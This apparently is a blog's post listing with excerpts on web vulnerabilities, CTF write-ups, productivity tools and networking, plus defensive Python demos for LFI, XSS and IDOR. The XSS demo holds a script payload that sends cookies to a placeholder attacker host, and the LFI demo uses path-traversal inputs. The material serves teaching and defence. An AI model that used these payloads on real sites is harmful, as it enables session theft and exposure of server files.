In the ever-evolving world of cybersecurity, understanding the vulnerabilities attackers exploit is crucial for maintaining robust defenses. One that poses a significant risk is Local File Inclusion (LFI), in which a web application lets user-supplied input decide which file on the server it reads or includes. This blog post aims to demystify LFI, explaining what it is, how it is exploited, and what measures can be taken to prevent it.
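The shape of the bug, as an added example that is not part of the original post: a page-include handler that joins a request parameter onto a directory, beside a hardened version. The sandbox directory, file names and the allowlist are constructed for the demo and assumed, not taken from any real application.

```python
import tempfile
from pathlib import Path

# Constructed sandbox (not a real deployment): a web root containing a
# templates folder plus a sensitive file outside it that stands in for
# /etc/passwd or a config file an attacker would want to read.
WEB_ROOT = Path(tempfile.mkdtemp(prefix="lfi-demo-"))
TEMPLATE_DIR = WEB_ROOT / "templates"
TEMPLATE_DIR.mkdir()
(TEMPLATE_DIR / "home.html").write_text("<h1>home</h1>")
(TEMPLATE_DIR / "about.html").write_text("<h1>about</h1>")
(WEB_ROOT / "config.ini").write_text("db_password=hunter2")

# Hypothetical allowlist of the page names the application actually serves.
ALLOWED_PAGES = {"home", "about"}


def include_vulnerable(page: str) -> str:
    """LFI as it usually appears: a request parameter such as ?page=home.html
    is joined onto a directory with no validation, so ?page=../config.ini
    walks out of the template directory and the file is read and returned."""
    return (TEMPLATE_DIR / page).read_text()


def include_hardened(page: str) -> str:
    """Two independent controls. First, the parameter must name a page from a
    fixed allowlist, so the attacker never chooses a filename at all. Second,
    the final path is canonicalised and checked to still lie under
    TEMPLATE_DIR, which catches any future change that weakens the allowlist."""
    if page not in ALLOWED_PAGES:
        raise PermissionError(f"unknown page {page!r}")
    base = TEMPLATE_DIR.resolve()
    target = (base / f"{page}.html").resolve()
    if base not in target.parents:
        raise PermissionError(f"{target} escapes {base}")
    return target.read_text()


def hardened_blocks(page: str) -> bool:
    """True if the hardened include refuses the request (used by the demo)."""
    try:
        include_hardened(page)
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable, normal :", include_vulnerable("home.html"))
    print("vulnerable, attack :", include_vulnerable("../config.ini"))
    print("hardened, normal   :", include_hardened("home"))
    for attack in ("../config.ini", "/etc/passwd", "home/../../config"):
        print("hardened blocks", repr(attack), ":", hardened_blocks(attack))
```

The allowlist alone is enough to stop the traversal; the canonical-path check is there so that a later change (say, reading page names from a database) does not silently reintroduce the bug.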
For many people, a major pull toward minimalism is the simplicity it provides. Not only the aesthetic simplicity but also the simplicity of choice, of habit. Minimizing and restricting choices and options can actually liberate someone in a way that the freedom of excess choice cannot. I argue that a similar outcome can be achieved with something I call bulk decision-making.
I love using Write.as to host my blog. I love using Obsidian to manage the bulk of my second brain. And it's the love for these two products that eventually led me down a rabbit hole in search of a way to potentially integrate the two together. Not only did I find a solution, but it works even better than I could've imagined.
The internet is a dangerous place, full of vulnerabilities attackers leverage to malicious ends. One of the more common vulnerabilities websites face is cross-site scripting (XSS), in which attacker-supplied input ends up executing as script in another user's browser. XSS attacks can have serious consequences, ranging from stealing session cookies and other sensitive information to defacing websites. Without wasting any time, let's jump into what XSS is, how it works, and how to mitigate it on your websites.
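A reflected XSS in a search page, as an added example that is not part of the original post: the raw-interpolation version beside the output-encoded one, plus the headers that limit the damage when encoding is missed somewhere. The payload, the attacker domain and the cookie value are constructed placeholders.

```python
import html

# Constructed payload: what an attacker would put in ?q= so that anyone who
# opens the link ships their session cookie to a server the attacker controls.
# attacker.example is a placeholder domain.
PAYLOAD = "<script>fetch('https://attacker.example/?c='+document.cookie)</script>"


def render_results_vulnerable(query: str) -> str:
    """Reflected XSS: the search term is pasted into the page as raw HTML, so
    the browser executes whatever markup the attacker sent."""
    return f"<h2>Results for: {query}</h2>"


def render_results_hardened(query: str) -> str:
    """Output-encode for the HTML text context. html.escape turns < > & " '
    into entities, so the payload is displayed as text and never parsed as a tag."""
    return f"<h2>Results for: {html.escape(query, quote=True)}</h2>"


def render_input_value(query: str) -> str:
    """Same rule inside an attribute: quote=True also encodes the quote
    characters, so the attacker cannot close the value and add onfocus=...."""
    return f'<input name="q" value="{html.escape(query, quote=True)}">'


def security_headers() -> dict:
    """Defence in depth for the spots encoding misses: a Content-Security-Policy
    that refuses inline scripts, and an HttpOnly session cookie that script
    cannot read even when one does run. The cookie value is a placeholder."""
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'",
        "Set-Cookie": "session=0123456789abcdef; HttpOnly; Secure; SameSite=Lax",
    }


def contains_live_script(page_html: str) -> bool:
    """Crude check used by the demo: is there an unencoded <script tag left?"""
    return "<script" in page_html.lower()


if __name__ == "__main__":
    print(render_results_vulnerable(PAYLOAD))
    print(render_results_hardened(PAYLOAD))
    print(render_input_value('" onfocus="alert(1)" autofocus="'))
    print(security_headers())
```

Encoding has to match the output context: the entity encoding that is correct inside an HTML element is not sufficient inside a `<script>` block or a URL, which is why templating engines that auto-escape per context are preferable to hand-rolled string concatenation.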
Brooklyn Nine Nine is an easy, beginner-friendly capture the flag exercise on TryHackMe. It features two different routes to gain both the initial foothold and the root flag. These avenues include weak passwords, poor FTP configuration, cleverly hidden credentials, and misconfigured sudo permissions.
Wgel CTF is an easy, beginner-friendly capture the flag exercise on TryHackMe. It features bad code commenting practices, a publicly available SSH key, and poorly configured sudo permissions which lead to exfiltration of data from the target server.
In cybersecurity, there is a buzzword I've seen some confusion about online recently. It's called zero trust, and though it sounds like vague corporate-ese at first, it actually represents a necessary approach to digital security.
Cyber threats are constantly evolving, and IT professionals need to be prepared for the worst at all times. Zero trust builds on defense in depth and the principle of least privilege across a network or a series of networks: no user, device, or connection is trusted because of where it sits, and every request is authenticated and authorized. But what exactly does that mean?
In infosec, there is a seemingly never-ending list of acronyms any cyber professional must be familiar with in order to work efficiently and effectively. One of those is a common vulnerability known as IDOR.
IDOR stands for Insecure Direct Object Reference, and it's a type of vulnerability that can have serious implications for the security of web applications if not properly addressed. But what is it exactly?
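The vulnerability in miniature, as an added example that is not part of the original post: an invoice endpoint that trusts the ID in the URL, beside one that scopes the lookup to the caller. The in-memory invoice table, the user names and the `Response` type are constructed for the demo.

```python
from dataclasses import dataclass
from typing import Callable, Iterable, List, Optional

# Constructed data: invoices belonging to two different customers.
INVOICES = {
    1001: {"owner": "alice", "total": "120.00"},
    1002: {"owner": "bob", "total": "5400.00"},
}


@dataclass
class Response:
    """Stand-in for an HTTP response."""
    status: int
    body: Optional[dict] = None


def get_invoice_vulnerable(current_user: str, invoice_id: int) -> Response:
    """IDOR: the handler checks that the caller is logged in (current_user is
    set) but not that the caller may see this particular object. Bob only has
    to change 1002 to 1001 in the URL to read Alice's invoice."""
    invoice = INVOICES.get(invoice_id)
    if invoice is None:
        return Response(404)
    return Response(200, invoice)


def get_invoice_hardened(current_user: str, invoice_id: int) -> Response:
    """Authorise on every object access: the lookup is scoped to the caller.
    A foreign invoice gets the same 404 as a missing one, so the endpoint does
    not tell an attacker which IDs exist."""
    invoice = INVOICES.get(invoice_id)
    if invoice is None or invoice["owner"] != current_user:
        return Response(404)
    return Response(200, invoice)


def enumerate_invoices(
    handler: Callable[[str, int], Response], current_user: str, ids: Iterable[int]
) -> List[int]:
    """What an attacker's script does against a sequential ID space: walk the
    range and keep every ID that answers 200."""
    return [i for i in ids if handler(current_user, i).status == 200]


if __name__ == "__main__":
    print("bob vs vulnerable:", enumerate_invoices(get_invoice_vulnerable, "bob", range(1000, 1010)))
    print("bob vs hardened:  ", enumerate_invoices(get_invoice_hardened, "bob", range(1000, 1010)))
```

In a real application the ownership condition belongs in the query itself (`WHERE id = ? AND owner = ?`) rather than in a check after the fetch, so that every code path that loads the object is covered.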
Bitwarden is one of the best password managers in the business. It's easy to use, open-source, secure, and cross-platform. Honestly, there are very few downsides to using Bitwarden.
And, as many of you may know, a password manager's best friend is a solid 2FA client. Though Bitwarden can generate TOTP codes from within the password manager as a premium feature, it has always been better security practice to keep those two things separate, so that a compromised vault does not also hand over your second factor.
Now, the team behind Bitwarden is helping you step up your security by offering 2FA code generation in a separate app: Bitwarden Authenticator.
In the world of networking, two fundamental models serve as the backbone for communication protocols and standards: the OSI model and the TCP/IP model. Both are layered frameworks describing how data is transmitted across networks at each stage of the process, though the OSI model defines seven layers while the TCP/IP model collapses them into four.
Understanding these models is crucial for anyone working in IT, cybersecurity, or any related tech field. But what exactly are they?